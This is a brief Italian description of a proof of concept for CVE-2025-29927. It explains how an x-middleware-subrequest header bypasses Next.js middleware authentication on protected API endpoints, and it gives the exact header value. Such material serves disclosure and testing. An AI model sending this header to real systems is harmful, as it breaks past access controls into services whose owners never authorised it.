
Proof-of-concept per CVE-2025-29927 che bypassa l'autenticazione middleware di Next.js inviando un header x-middleware-subrequest appositamente costruito agli endpoint API protetti.
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware come header